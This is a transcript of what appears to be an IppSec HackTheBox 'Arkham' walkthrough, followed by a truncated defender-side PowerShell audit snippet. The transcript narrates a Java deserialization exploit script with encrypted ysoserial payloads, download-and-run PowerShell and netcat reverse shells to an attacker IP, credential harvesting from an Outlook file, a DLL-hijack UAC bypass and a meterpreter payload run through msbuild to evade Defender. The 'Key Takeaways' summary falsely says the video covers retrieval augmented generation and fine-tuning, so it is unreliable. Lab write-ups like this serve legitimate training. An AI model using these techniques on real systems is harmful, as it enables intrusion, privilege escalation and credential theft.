HackTheBox - Arkham

IppSec · Intermediate ·📰 AI News & Updates ·6y ago

Key Takeaways

This video demonstrates a Java deserialization attack to get code execution on the box, using tools like Burp Suite, SMB shares, and Python, and covering concepts such as retrieval augmented generation, fine-tuning, and Java deserialization attacks. The video also explores exploitation, post-exploitation, and UAC bypass techniques.

Full Transcript

What's going on YouTube, this is IppSec. We're doing Arkham from HackTheBox, which was a relatively difficult machine for me, mainly because of the Java deserialization attack. It actually encrypts the Java object in the ViewState parameter, so you can't just find the deserialization by looking for the magic bytes ACED or rO0; you have to do a bit of digging in the actual application. The decryption key for the object is in an SMB share, in a LUKS container, so once you crack the LUKS container you can find that key in an old config file, do some magic in Python to encrypt the output of ysoserial, and get code execution on the box. Then, when you're poking around the box, you can find credentials for an administrative user in a PST file for Outlook. You use those credentials to get on the box as admin, but there is UAC preventing you from getting to the flag, so you have to do a UAC bypass, and when you do that you are golden.

So let's just jump into the box. As always we begin with nmap: -sC for default scripts, -sV for enumerating versions, -oA to output all formats into the nmap directory and call it Arkham, and then the IP address, which is 10.10.10.130. It can take some time to run, so I've already run it. Looking at the results, we have a handful of ports open. The first one is HTTP on port 80, and that's running Microsoft IIS version 10.0, so a Windows 10 or 2016 box. Then you have your remote procedure calls on 135 and 139, SMB is open on port 445, and we have another HTTP port open on 8080 that is running Apache Tomcat version 8.5.37. Then, outside of ports, nmap is telling us there is a clock skew of seven minutes, so if we did anything crypto or Kerberos related and had weird issues I'd probably try getting my box in sync with the target box, because those depend on time. And finally nmap is telling us that message signing is enabled but not required. That doesn't really mean anything for HackTheBox machines, because it's generally isolated to one machine, but if I saw this
on a pen test I'd probably start up Responder and set it to do an NTLM relay attack while I work, just in case I intercept a request from an admin and get escalated right away via NTLM relay. But that's probably not going to go into effect, so let's just move on and take a look at the web page.

So going to 10.10.10.130 we just get the default IIS page, so I'd probably start running gobuster in the background to see if I can brute-force anything, but I'm not going to do that right now because I'm doing the video and it takes up resources, which could slow down my machine. So checking on port 8080, http://10.10.10.130:8080, that was open. Let's see, nc -v 10.10.10.130 8080, it's just going extremely slow, that is bizarre. But we get a web page from Mask, "stay hidden", and going down I'm just looking for potential domain names or usernames, so mainly looking for emails. We see this is at 15 New Street, Greywall, Wetworld, I don't know. Looking at these Facebook and Twitter links, nothing there. We click on Company, it doesn't do anything. About Mask, we had already seen that. If we go to Subscription it looks like it's loading. So what does that... I'm going to click on Contact Us and just Subscribe to Newsletter. Clicking on... what did I click on up there? This subscription link brought us to userSubscribe.faces, and I'm just going to test something: what would you like, test@test.com, and see what it says. It just says thank you, it's been registered.

So I'm going to set up Burp Suite and we're just going to see exactly what this does. So click sign up again, go to Burp, and we can see everything it's sending. So we have the ID JSP, there's going to be the email, a function called up, we've got javax.faces.ViewState, and then a long base64 parameter. ViewState, I'm probably going to butcher the explanation, but essentially, instead of storing your entire cookie on the server, the ViewState is the cookie, I guess, and we can see a bunch of gibberish. I think if this wasn't encrypted then we'd be able to see some data
about it. So if we echo -n it and pipe it to base64 -d, just nothing. We can send this over to a file and run file against it, and it says it's data, so it doesn't recognize it. So we can Google around and see exactly what this parameter is. So if we go to Firefox, Google this, probably turn Burp Suite off, and then Google javax.faces.ViewState. It was my internet that's going slow right now. Additionally I'd be looking at what this .faces extension is doing; either of these would get you to this page. So you can read this article, and it's not going to help us too much because the ViewState is encrypted. So let's see, can we see if this one is encrypted? See "unencrypted ViewState", yeah. So this is kind of what it should look like, I think, rO0... this is a Java serialized object, that's just the base64 of it. So if we echo -n it and pipe it to base64 -d we can see java.lang.Object. So that's what we'd expect to see if it's not encrypted, but because this one is encrypted you have this issue. You can also just Google for the Java magic bytes, like "Java magic bytes serialized", and it's that rO0 or ACED. So if you see either ACED as the magic bytes or rO0AB, that's most likely going to be a Java serialized object.

So since it's encrypted we have to find a way to decrypt it. I'm going to go back over to my nmap scan results and see if there was anything else. There is port 445, so let's try smbmap -H 10.10.10.130 to see if there are any open shares on this box. We just get access denied. I'm going to specify the user anonymous and try an anonymous logon on this box, and we no longer get access denied and it starts listing out shares. So we see the ADMIN$ share, no access; BatShare, we have read-only; we have read-only over IPC$, and we also have read-only over Users. So I'm going to specify -R for recurse and then depth, we'll do 5, so we'll just start listing out all the files in these shares. So in BatShare we see the file appserver.zip; these are all named pipes,
essentially, and then we have the Users directory, but we can only see Default and Guest. We can't go down into these folders, unless we would have, because we have recurse set. So I'm going to do smbclient -U anonymous //10.10.10.130/BatShare, I think, oh, just hit enter for the password. Do nothing, do ls, and we see the file there. So I'm going to do get appserver.zip to start downloading this, and it may take a little bit. Let's just open up a new pane and make sure it is downloading, so we'll do du -s appserver.zip, and it's not grabbing it. I guess we'll just wait for this command to finish. Um, it just gave a weird error message, parallel_read returned NT_STATUS_IO_TIMEOUT. I'm going to restart this, I'm not sure exactly what happened, but I don't think we should see that. So do get again on appserver.zip and we'll see if it downloads it. Tell us that way, still not getting it, but it may be running into a cached file somewhere. Let's try smbclient -N, this shouldn't do anything, maybe it will, //10.10.10.130/BatShare, and we can actually, before doing that, mkdir smb, cd smb, get appserver.zip, and it worked. That is bizarre. Try this again, get appserver.zip, it got it there. So I don't know why my SMB is being wonky. We can md5sum the two files to make sure we got the same thing, so md5sum appserver.zip and smb/appserver.zip, and they are the same. So I'm just going to remove the one in my parent directory and go into this smb directory. No idea why it was acting that way.

So let's unzip this, and we've got IMPORTANT.txt, and this is saying: "Alfred, this is the backup image from a Linux server. Please see that the Joker or anyone else doesn't have unauthenticated access to it. Bruce." So this is the very first hint that this is going to be a Batman-themed box, because you have Alfred the butler, Bruce, that is Batman, and the Joker. So then we have something, we've got appserver.zip, so if we... I just did unzip that, and that gave us the backup.img file. So if we do
file against that we can see it is a LUKS encrypted file. So if we go over to Google and search "hashcat luks decrypt" we should get an article, I think Hacker Noon will be fine, and reading this whole thing gives you instructions on how to get the header hash: dd if=backup.img of=luksheader bs=512 count=4097. It's not always going to be there, I'd say 99.9 percent of the time it's going to be there, but one safe thing to do is run cryptsetup luksDump on backup.img, and then this payload offset, that 4097 is just one above this. So we can do dd if=backup.img, that is the input file, of, output file, arkham-luks, block size equals 512, and count is equal to 4097. So now we should have the LUKS header and we can send this over to hashcat.

So I'm going to scp this to the Kraken, which is just a cracking server I have that has graphics cards to crack with. You don't need this, but I would recommend not doing any hashcat-type stuff inside a VM, because it's very CPU intensive and you probably don't have many resources in your VM to crack with, so that's why I'm copying it off my machine, and you should just copy it to your host or somewhere else. So we can copy arkham-luks to hashcat/hashes, and we can go into hashcat and type hashcat --example-hashes and search for LUKS, maybe it's all caps, there we go, and it's mode 14600. So I'm going to do ./hashcat -m 14600 hashes/arkham-luks and then the wordlist I'm going to use is rockyou.txt. This is probably going to take an extremely long time. You had a bunch of hints that the box was Batman themed, with the name Arkham, Alfred, Bruce, the Joker, so you may just want to create a password list based upon Batman characters and then try this, because LUKS does not decrypt fast. So just let this go, we'll get the password and then keep on going. And there we have it, it has cracked the password as LUKS: batmanforever. So I can just copy this, open a new session, the passwords file, and I'm going to put batmanforever there, so we
save it. And then we can go into the smb directory and mount this, so we can do cryptsetup luksOpen backup.img and then we'll call it arkham, and the passphrase, batmanforever. Then if we look at /dev/mapper we should now have arkham here, so we can mount /dev/mapper/arkham to /mnt. If we go into /mnt there is now a lost+found and a directory called Mask. Go into Mask and we've got a few JPEGs, docs, and tomcat-stuff. So I'm going to do nautilus . to open up my file manager and look at this. So more Batman pictures. Going into docs we have Batman Begins, and it looks like a script for it. So let's go back into tomcat-stuff, and it looks like we have a bunch of configs.

So let's go into tomcat-stuff. The first thing I look at is tomcat-users, and we see it looks like everything is commented out. One thing I should have done at the very beginning is, because it is Tomcat, try /manager or maybe /admin to see if any of those endpoints exist on Tomcat, but it doesn't look like they do. So nothing's too interesting in that tomcat-users. We can look at server.xml, let's see, doesn't really look like anything too interesting. Let's do faces-config; so now we have just the basic web page for faces, nothing too interesting there. If we do web.xml and just look through this, it looks like something very stock. Let's look at web.xml.bak, and this looks completely different than web.xml. Like, this is very much the default web.xml, and .bak is clearly something that is not default. So let's take a look at this a bit more. We have display name HelloWorld JSF, then we have the Faces Servlet, javax.faces.webapp.FacesServlet, here's the extension, so anything with .faces will get sent through this config. If we keep going we do have the org.apache.myfaces.SECRET and then this, which is the key used to encrypt. So let's grab this, and it's also telling us it's HMAC SHA-1 for the algorithm. So yank, then actually yank it, I'll probably just copy it into
something else. vi passwords, did not... so let's just cat web.xml.bak, and where is it, here it is, grab this, paste it here. I know it's a secret, not a password, but same difference for us. So we want to make sure we can now decrypt that ViewState parameter. So let's see if that thing is valid.

To do that we have to begin creating a Python script, so we'll call this exploit.py. The first thing I know I'll need is base64, so do from base64 import b64decode and b64encode. Then I also know I need SHA-1, so I do from hashlib import sha1. So we can begin a function, def decrypt_viewstate, and we can give it the parameter viewstate. So the key is equal to b64decode and then that will be, cat passwords, this. Okay, now we run into the problem of not knowing what encryption algorithm this is. So we could try print decrypt_viewstate, and we just need to get a ViewState thing. So this string came from here, so this is the ViewState we want to decrypt, but we don't know how it was encrypted. So this is where we have to go and read documentation from Apache MyFaces. So if we do "myfaces web.config", let's see what this has, is this the page? Yep. So let's see, this has all the variables of how to do the web config, and we see there is this org.apache.myfaces.ALGORITHM. If it's not defined then it is DES, but it can be other things like AES, Triple DES, and whatnot. So I'm going to go into /mnt/Mask/tomcat-stuff, grep for that against all those files, and we don't have anything. So this is telling us it is probably DES.

So I'm going to do python3, I'm going to see if I can import pyDes, I could not, so I'm going to do pip3 install pyDes, and while that installs we can import pyDes, we can import, I think, hmac, I forgot. So now that pyDes is installed we can begin the decryption. So let's do obj is equal to pyDes.des, pass it the key, this is going to be in ECB mode, and the pad mode is equal to pyDes.PAD_PKCS5, and you'd probably have to read the pyDes
manual to understand all this, but these are just the variables we saw in this: here's that PKCS padding that I see, the SHA algorithm, HMAC SHA-1. So just read that page and then create the correct parameters. So now we can do dec, for decrypt, is equal to obj.decrypt and then we want viewstate, and that is going to be passed through the variable name, and if we print, we can just return dec and we'll see what this does. We may get lucky and this may just work. Let's see: data length must be a multiple of eight bytes. There's going to be some type of weird padding. I don't think I'd have to do that, because I have it specified in pad mode. Oh, I'm actually not base64 decoding the ViewState. So let's do viewstate is equal to b64decode(viewstate). So let's try this again, still the same thing. Let's print the length of viewstate: it is 92 characters in length, and the nearest multiple of eight would be 96 or 88, so let's just pad this with four bytes. So let's do viewstate is equal to viewstate plus four null bytes. So now this should be a length of 96, which should pass any padding, and there we go. So we see the ACED, so this is definitely a Java serialized object, and we can see java.lang.Object. We could also, if we wanted to, print the b64encoded version of this, and you can see that rO0, so we definitely have the correct decryption key.

So we have that there, and we can begin with creating our payload. So we're going to use ysoserial to generate one. Do I have it? I do not. So let's go and Google ysoserial and we'll download this. So we don't want the .NET version; there was a .NET one that could be fun to play with, but download the latest JitPack. So we'll do wget, let's make a directory ysoserial, and then wget the jar file, and now we should be able to do java -jar ysoserial and we get it. So if you did a lot of searching around MyFaces, you know there's CommonsCollections, uh-huh, we actually got MyFaces here. One of those would work, but I'm going to use CommonsCollections. So Commons
Collections 5, it should be up here, yeah, that's the one I'm using. You can play around with a bunch of these to see if they work. I've used a lot of the CommonsCollections ones before, which is why I'm using that one. Then we can do cmd /c ping -n 1 10.10.14.3 and see... I thought that was it to generate, maybe I misspelled CommonsCollections, let's copy this, paste it, there we go. So I'm going to redirect this to /root/htb/boxes/arkham/payload.bin and we'll leave this here; after we get this working with CommonsCollections we can try it with the specific one for MyFaces.

So we do def create_payload and we can do payload is equal to open('payload.bin').read(), and do we have to do anything like that, and we can return payload. We also need one for encrypt_payload, so this will be these lines, and then we do enc is equal to obj.encrypt(payload), and then we need to generate the HMAC, so hash_val = hmac.new(key, enc, sha1).digest(), okay, and now the payload is equal to the encryption plus the HMAC, and we return the base64 encoded version of the payload. So let's see, trying to think how I did this, yeah, that's correct, so return encrypt_payload(payload). So when we call create_payload it's going to open payload.bin and read it, and it's going to pass that to encrypt_payload, which is going to do this magic, and that should be it. So let's try print create_payload. I think I put an underscore, I did, syntax error on line 27, there we go. So now we have our payload; the next thing we have to do is actually send the HTTP request. So we can import requests, and let's see, we'll do def exploit, going to give it a command, viewstate is equal to create_payload, and then data is equal to javax.faces.ViewState: viewstate. Okay, now we can do requests.post, I think this is a POST request, URL, let's define URL here at the top, so url is equal to http://10.10.10.130/userSubscribe.faces, url, data is equal to data, and that should be it. So we can just call
exploit and we'll see if it works. So python3 exploit.py, go down here, tcpdump -i tun0 icmp, let this run, and we don't get anything. So we have a mistake somewhere. So let's print viewstate and we'll do r is equal to this and print r.text. Okay, we have a 404 error, file or directory not found, so chances are the URL is wrong. That's probably because we didn't do port 8080. So I did that, and now we have a callback. So every time I run this we get a ping. We do see the web page is... everything out, so it doesn't look like we could get any text back, so this is kind of a blind exploit. So let's try one thing real quick, let's copy payload.bin to worked.bin and let's try the ysoserial with the MyFaces. So the same exact thing, except we're going to try Myfaces2. Did I... Myfaces2, maybe I screwed something up, that's so weird, Myfaces2, I guess I have the command format wrong. Anyway, I tried Myfaces1, since that generated a payload, we get this, it is a payload. So let's go back and just run our exploit script, and that one's not working. So I recommend using the CommonsCollections, and CommonsCollections is just a Java library that's on the path. Deserialization exploits allow you to create gadgets into libraries that are on the path to achieve command execution.

So the one thing I don't like about this right now is we don't have a way to easily edit the commands; we have to run ysoserial every time. So if we look at payload.bin with xxd and go to where cmd is, we have cmd /c ping -n 1 and the IP address, and just before cmd you have 1b, which is going to be the length of this command. It's a serialized object, that's just the format. So if we take this out and then just put the length in ourselves and then put a command, we don't want to call ysoserial anymore, we can just put any command we want. So let's do that. The first step will be getting this payload into a Python format, which is just hex but with a backslash x every two characters. So we'll do xxd -p payload.bin, and now
we have to put the backslash x in, so I'll do that with sed: match a period, period, for two characters, replace with backslash x and ampersand, so that it won't delete what we had before, and then /g. So now you have all the backslash x's, and then we can for-loop this, so for i in this command, do echo payload += and then the byte string of i, end quote, done. So now we have everything there, we can pipe that over to xclip -selection primary to put it in the clipboard, and then go back into our exploit script. So that's where encrypt_payload is, comment that out, paste, capital V, go all the way up to what we want, and then I'm going to hit the greater-than sign, I guess on a US keyboard it is shift period. And then we need payload is equal to b'' at the top.

So let's see what we have to do now, we have to find cmd. So let's go man ascii and find where c is; so c is hex 63, so we're looking for 63 6d, then 64, so backslash x63, backslash x6d, I think I said 6d, and then 64, so this is where our string begins. So we can uncomment that and we'll do payload += and then we have to do a command, so we want the character length, so len(cmd), but that's going to be an integer, so we'll do the chr of that, and then we also have to convert it back into byte format, so that's going to be the payload length, and I need to end all these parentheses, and then we do payload += and then cmd.encode; the .encode just puts it in byte format, and this will be the command. So what we have to do now is go to the very end, so we're looking for, I think it's 10, I think one is 33, what is 1? Let's find where one is, the hex character for one, where the digits are. I'm just going to do python3, x = '1', print x, well that didn't work, no, have it right here, 31. So I want 31 30, because that's going to be an IP address, 33 is 3, so we want to search for backslash x31 backslash x30, so this is 10, 2e is period, 10 period 10, then 33 will be 3 I believe. So let's go back into the ASCII table and validate that 33 is 3, and that's where a
command ends, it's ping 10.10.14.3. So put a clip here and delete all this stuff. Okay, so now the thing to do is go up here and test this out by doing cmd is equal to cmd /c ping -n 1 10.10.14.3 and seeing if this still works. So python3 exploit.py, tcpdump -i tun0 icmp, and it does. So now we can create a little loop and go along a way, so I'm doing create_payload with the command that's going to be cmd, and then we'll call exploit with the command cmd, and we'll just be lazy, we won't do the command-line loop, we'll just do while True and then exploit(cmd), and we can say cmd is equal to input('please subscribe'). So python, let's get rid of these prints real quick, print, we don't need these, there we go. cmd /c ping -n 1 10.10.14.3, create_payload is missing one required positional argument, let's see, create_payload(cmd), okay, that flies, copy and paste, it's working.

So what we can do now is try to get a reverse shell. So we don't have the ability to see output, so we can do nc -lvnp 9001, and we can also try out-of-band methods like encoding data in ping or DNS requests, but just a reverse shell will be easier and quicker. So if this fails at getting us a shell, that's when we move to other things. I'm going to make the directory www, go in here and copy /opt/nishang, what is it, Shells/Invoke-PowerShellTcp.ps1, and let's call this shell.ps1. vi shell.ps1, let's see, we want to grab this one, the reverse, and we'll put it here, we want 10.10.14.3, port 9001. So we can now save this and then just do python -m SimpleHTTPServer 80, on port 80, and now we can try IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3/shell.ps1'), and it doesn't ever get to us. So what I'm going to do next is just try it without IEX, and maybe antivirus killed it because it didn't like IEX, just basic troubleshooting, taking things out, and we don't get anything. So I'm going to try Invoke-WebRequest -Uri http://10.10.14.3/shell.ps1, and that one should have grabbed it. Let's try nc
-lvnp, but let's do tcpdump -i tun0 icmp again, just want to make sure this is working. Still, ping works, try ping -n 2 10.10.14.3, ping twice, so we're not limited on command length. Oh, duh, I'm not doing PowerShell. So we can try typing powershell and then paste; we don't get any hits with the New-Object. Let's try PowerShell with Invoke-WebRequest, so powershell, paste that in, and we get the hit when we do Invoke-WebRequest. So let's actually move that one down here, okay, that'd be a bit easier to read. So PowerShell constrained mode is probably enabled, which disables doing things like this, so we just have to do native PowerShell, which is fine.

So we can go to Firefox, we can try to download netcat 64, "netcat windows", and let's see, eternallybored.org, this is the one I want. We can download this, then go into Downloads, unzip netcat, and then move nc64.exe to htb/boxes/arkham/www/nc.exe. So now we can do powershell IWR, which is just shorthand for Invoke-WebRequest, -Uri 10.10.14.3/nc.exe -OutFile, we'll save it to C:\Windows\Temp\nc.exe. So we have it downloaded, we can try cmd /c, what we want, C:\Windows\Temp\nc.exe 10.10.14.3 9001, I think it's -e for program to execute, and we'll do powershell.exe. And there we have it, we are now running as Alfred on the box. We can do whoami /priv to see if we have the SeImpersonate token, which we don't. So let's go to cd /, do ls, we have Users, Alfred is who we are, and then inside Desktop we do have the user flag. We could also do GCI, or Get-ChildItem -Recurse ., to list all the files, and you should do things like this, because you see there is a backup.zip. So we did GCI -Recurse .; we could also do select FullName, which just puts it in a bit easier format. So we've got tomcat.bat that we may want to look at, so we just look at that and it doesn't seem too interesting, but this backup.zip is pretty interesting. So we've got to get this zip back to our box, so we could try to
do it through netcat, but I'm just going to use certutil and then we will copy and paste it. So certutil -encode, I'll paste the path, and then we want to send it to C:\Windows\Temp\backup.b64. Encode command completed successfully. So now we should be able to type C:\Windows\Temp\backup.b64, and let's see, type C:\Windows\Temp\backup.b64, there we go. So we can just highlight everything and then copy it down to our machine. That will open a new shell, I'll rename this to alfred, let's do vim backup.b64, paste, and we can base64 -d to decode it and then call it backup.zip, and then let's mkdir alfred and we'll move backup.zip there. I just hate unzipping things in my parent directory and then they just have more files than expected, but this just has one file, and that is an OST file. So we do file against that, we just see it's a Microsoft Outlook email folder. We can do readpst against this, and then that creates a mailbox file. If we go into this we can see just various emails from it; it's going to be HTML encoded in base64, so it's not easy to read, but we do have Evolution. I think we can just specify drafts.mbox and Evolution will import it. So if we just input the data, click next, location, fine, and we have one new message. For some reason with Evolution I don't see it open, let's try just opening it without the argument, there we go. So we have On This Computer, Inbox, one mail, MAILER-DAEMON. If we open this we have an email, probably from Alfred, it just says MAILER-DAEMON to Batman: Mr.
Wayne, please stop forgetting a password, and that shows the password for Batman. So let's move this down here so we can easily type; I'm going to move it up a little bit, there we go. So I'm going to go into my passwords file, vi passwords, and we want to do Z X caret pound Q Z X plus T exclamation point one two three. We can cat this so we can easily copy it, and now I want to do smbmap -u Batman -p, paste in the password, -H 10.10.10.130, and we see it let us log in. So we have the password correct, but it doesn't really buy us anything. We actually lost access, hilariously enough, because we used to have access to BatShare and we don't anymore. So if we put in a bad password, let's just get rid of a few characters, we should see access denied. So we know we have Batman's password, it's just not working.

So we go to nmap, oh, come down, nmap, see if there are any ports that we missed, probably not. I mean, we can't really do psexec because we can't write to C$ or ADMIN$, and I don't see any other ports exposed to us. So I'm going to do nmap -p- -v, for verbose, -oA nmap-allports 10.10.10.130. We can close that Evolution, we don't need that anymore, and then while this runs let's just try something over here. So let's try password is equal to ConvertTo-SecureString, oh crap, okay, let's cat credentials, or cat passwords, grab it, go back to Alfred and let's run this command again. So what we're going to do is try PowerShell remoting through localhost, because it isn't always exposed over the network but it may be exposed locally. We can't just do runas because we don't have a full shell, so this is the next best thing. So that command should work if we pass it as a plain text secure string. The next thing we have to do is create the credential object, so New-Object System.Management.Automation.PSCredential, and this is going to be for Batman, and then we want to put the pass. Okay, so let's look at the hostname; the hostname is ARKHAM. Whenever you do
Windows remoting you always should use hostnames and not IP addresses. So we do Invoke-Command -ComputerName Arkham, oh heavens, I've been spelling Arkham wrong all this time, A-R-K-H-A-M, I think I've been doing A-H-M, oh well, okay. And then we want to do -ScriptBlock { whoami } and then -Credential $cred. Okay, we have it running, we are now escalated to that user. So we can try downloading netcat again and grabbing it, so IWR -Uri, what is it, 10.10.10.14 or 10.10.14.3, nc.exe, -OutFile nc.exe, -Credential $cred. I wish I had done rlwrap when doing this, because it would have saved me headaches by allowing me to have the up key, oh well. So now that we've got netcat there we can do cmd /c nc.exe 10.10.14.3 9001 -e powershell.exe, -Credential $cred. So let's try nc -lvnp 9001 on this, and I'm going to learn from my mistake and do rlwrap this time, so just copy and paste this. Okay, so now that it's rlwrap, you can see this is going through previous commands with my up key, so that's very nice to have, and I can do Ctrl-L to clear the screen.

So now that we are the Batman user, let's see what we have in the directory, so GCI -Recurse . | select FullName, and we don't really have anything else. There is another tomcat.bat file that we can look at, so we can look at that, same exact thing. We can run systeminfo, and because we're in PowerShell constrained mode, that's why I'm not running things like PowerUp; we get access denied with systeminfo. We can verify PowerShell constrained mode, so we'll just do New-Object Net.WebClient and we see "only core types are supported in this language mode", so we did confirm that's why that wasn't working before. We can try net localgroup administrators and we see that we are a member of the Administrators group. So if we just go cd .., cd Administrators, or cd Administrator, we can't do it, we can, but we get denied when we ls inside of it. So we do whoami /all, and we should see we have the same exact
privileges as a normal user. Let's see here, the groups we're a member of, BUILTIN\Administrators, but I'd expect to see more privileges, and this is because of UAC, User Account Control. So there is a bypass to this; we could just do net use Z: \\127.0.0.1\C$ and then go into Z: and then Users\Administrator and get his hash this way. So that's one way to do it, but if you wanted to... and I have no idea why this way works, honestly, because I had done chisel and forwarded port 445 from localhost to my machine and it still didn't let me access C$. So I'm guessing even though we're specifying \\127.0.0.1\C$, it's not doing it over the network; it's a different authentication than through smbclient or something. So not sure exactly why that works, but it does.

Going to the UAC bypass, the easiest way to do this is getting a session under an interactive process, because most UAC things are based upon the process elevating and having a GUI, and right now we're in a non-interactive mode, which means we just don't have access to those, so anything we do won't work. So the first thing I'm going to do is find a UAC bypass. I'm going to Google UACMe, and this just has bunches of good information. Let's see, go near the bottom, I think when it has this it's unfixed, so do the one from egre55. What's the implementation? UCM egre55 method. Just Google egre55 UAC bypass, we go to his GitHub, and this explains how to find it: find binaries that have autoElevate set to true and then find ways to exploit them. So this one, if we create a DLL and place it in the WindowsApps folder, then this binary will load that DLL for us and execute it. And if you set the UAC policy to always notify then this autoElevate thing doesn't exist and these types of things are patched. So here it is, so you want the DLL, SRRSTR.dll, to be in, I think it's WindowsApps, the WindowsApps folder, it says it's somewhere, oh, right here, so if we put the DLL in C:\Users\<user
name app data local Microsoft Windows apps tol we can execute it so what this is showing us this is proc Mon and proc mom is running when it opens that file and we can see it's looking for that do l and all these locations and getting name not found so it checks all these directories which we can't write to we can't write to the windows directory most likely but we can write to or use a directory and that's the final place it loads from so that's why this is all working so we have to do two things now we have to create a DLL and we also have to escalate to a interactive session process so to get the interactive session process we're going to use meterpreter and Metasploit and then to do the dol we'll just code it by hand so this box does have Windows Defender on it so we can't just drop meterpreter you could use like go Ebola that's eb o WLA we've done that in other videos if you just search upset Cibola you can find the video that does that but we're going to show a different one we're going to use msbuild so we'll do great SCT and go to this github project CD up get clone download this and then we have to set it up so if we do setup so SH continue with installation yes and this will take a while to set up so we'll rename this to create SCT and then we'll start creating or a DLL so make dur DLL and then we will make main dot C the first thing we do is this windows definition so include windows dot H and then we create the DLL and this would probably be auto-generated for you if you used any like IDE or anything but it's basic so H instance that D word DW reason and we need LP void lb reserved okay and then switch DW reason so these will be a case statement with everything so DLL process attach this will be do stuff and we have to do semicolon break then case DOL process detach break okay DOL thread attached and we just looked at like the windows API you know all these commands we have access to like DLL process attached because of that Windows dot H click ok this 
is just great st SE t still installing so case DOL thread detach break okay we can close out of the switch then return 0 that so do stuff this is what we're gonna do Oh code so I'm just gonna call when exec I'm going to do C colon users Batman NCT XE 1010 14-3 9001 - e powershell and like that so upon attaching the DLL we'll just call this neck head binary and send this reverse shell that is it for the DLL so we can close out of that and then do I 686 windows 64 m and GW g plus plus main c standard compiling flags and the name was sr STR gol - shared because it's a DLL and let's see we probably have a typo yep d teach detach compile and now we got the DLL great SCT is still installing so we just got to wait for this to complete and then we can get our DLL set up actually I guess we could copy it over so go here we can copy this to dub dub dub go back to a Batman shell we know we can write into this directory cell IWR and the web request URI HTP 10 10 14 3s r st r dot dl l - out file same thing to download this LS ok we got it I guess we should have done that once we went in here but we got to go into where is it it was app data local just update a local Microsoft Windows apps Microsoft Windows apps so copy see : users batman sr str dll to this directory okay so that's all now setup and it's still doing something I don't know why it's I guess I did an apt update because now it's installing Metasploit framework which I know I have so it's by just updating it so if we have an interactive session and execute this binary we will get a show didn't mean open link take on my clipboard it did not let's go back copy you can do NCO VMP 9001 when does it kill my shell it's not it there we go Fielder on operational choirs an interactive window just got to wait for this which now it is finally done so we can go see DDOT and execute this application so we can just type list to see the available tools it's only got bypass will choose one or do list again ah menu choice one use one 
okay so now we got 26 payloads to choose from so we can do list again and see all the payloads I'm just going to use my trip to reverse TCP so use nine so now we just specify el host out port and such and it should work so we can set el host 10 10 14 3 set el port or do nine thousand two and then generate base name for the output files default is payload it's fine with me so now we've got the Metasploit or C file so we can do MSF console - our paste the RC file then we can grab this payload XML and copy this to the dub-dub-dub directory okay so now we just have to download this payload so invoke web request and then your in10 14-3 slash payload xml out file payload xml so now we have it and the final thing is to use msbuild to execute this so now we just have to find where msbuild is sin that is normally in sequel in windows microsoft.net and then we want framework 64 then V 4.0.3 o31 nine and my msbuild should be in there so msbuild dot exe specified payload xml and i guess we can do CMD / c build started it aired but we got meterpreter session 1 has been opened so I can do sessions - I won and I'm gonna move my neck at Shell over to my meterpreter window and the temperature session one died let's try this again one thing is supposed to begin those errors reduced sessions - I - I doubt it works we do help it only loads the core commands and never loads the advanced API so what I think happened as I loaded the 32-bit version and great asset or great SCT did 32-bit meterpreter and I specified framework 64 which does the 64 bit version of msbuild which isn't working so I got rid of framework 64 for a framework and I'm not getting that error message anymore and it looks like it's working if I do help we have standard API commands so now I can do PS and we can try to migrate in 50 20 and this may take a few times because Windows Defender may kill it or it may not it doesn't always kill it for some reason so this time it looks like it's going to die which means we'll 
just have to get another session and do this again so probably take three or four times so first one timed out let's do this again session 4 opened so let's do sessions - I for PS migrate 50 20 and all we have to do is migrate in a process that has this one so we got in so now if I do she'll we can go to where Batman is and let's go up where was that application that required interactive interactive I guess we can just copy it so still here all I'm gonna do is copy this go back to here paste it in and nothing well that's unfortunate let's do CD backslash users Batman local CD users Batman app data local dir CD Microsoft CD Windows apps I think dir a DLL is there system properties advanced exe not working could have swore that would work um let's see let's look back at a dll v main c c : users Batman NC Exe let's make sure that exists dir we do not have netcat here so we probably put neck at somewhere else let's just download it your eye 10 1014 3nc dot exe out file NC dot exe dir now that net cat is there paste and still nothing let's see C : users Batman NC exe 10 10 14 3 that should work let's just copy and paste this into a Batman shell go here ok that works I guess we could try run DLL 32 DLL definitely works don't know where that application is not going system properties advanced exe let's just try CMD / SI system properties advanced dot exe taking longer this but we still aren't getting a shell I wonder if my shell up here is just dead and that's why is let's do PS PID how do I do find out what process I'm in get system let's see new ID no PS let's just try this one more time CMD /c let's try full path windows 64 system properties advanced dot exe and let's make sure I'm doing 9001 which yes I am and CL VMP 9001 run there we go I won't if we need the full path or maybe I just I don't know if we do who am i / all now we can see a bunch more privileges than the just two we had previously and we go to CD users administrator desktop where you can get root our 
text so let's play with this real quick let's do show if we just do this doesn't execute CMD / see that CMD / C and then the full path let's so we have to kill it now advanced so I guess we can kill one seven six four okay shell system properties advanced dot exe so we just run this nothing CM d /c run that nothing CMD /c c colon windows sis well 64 that that's literally what I just did maybe it didn't kill it so let's see this was the 1 cm d /c windows as well system properties advanced audience it can't be the casing on this can it I'm going insane right now PS system we're gonna try this one last time advanced so kill 21:56 okay shell so NCLB NP 9001 pace that all I want to grab is this nothing CMD / see nothing let's get out a system 32 ok CMD /c c colon windows sis well 64 that so capital s capital w CM d /c c : windows sis well 64 I'm not sure why it works sometimes on why it doesn't work other times unless I keep making weird typos let's see maybe just doesn't like this session maybe it's because I keep doing a new session let me just copy this exit PS advanced it's probably related to that actually so kill to 360 so yeah so probably should be one of the first commands you run in the session if you do other ones you may just put in a weird state so hope you guys enjoyed that box take care and I will see you all next week
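As an added example that is not from the video, here is a defender-side PowerShell audit of the three conditions the UAC bypass described above relies on: the UAC level (the video notes that "Always notify" turns auto-elevation off), a UAC-filtered administrator token of the kind whoami /all revealed in the Batman shell, and a DLL sitting in the user-writable WindowsApps folder that the loader probes last. The registry key and value names are Windows' documented UAC policy settings and the WindowsApps path is the one named in the video; the function names and the Get-LocalGroupMember-based membership check are this example's own choices.

```powershell
# Added example (not the video's code): audit a Windows host for the conditions
# behind the SystemPropertiesAdvanced.exe / srrstr.dll UAC bypass discussed above.
# Registry names are Windows' documented UAC policy values; everything else is
# constructed for this example.

function Get-UacPosture {
    # "Always notify" = EnableLUA 1, ConsentPromptBehaviorAdmin 2, PromptOnSecureDesktop 1.
    # Only at that level does Windows stop auto-elevating manifest-marked binaries,
    # which is what removes this whole class of bypass.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p   = Get-ItemProperty -Path $key
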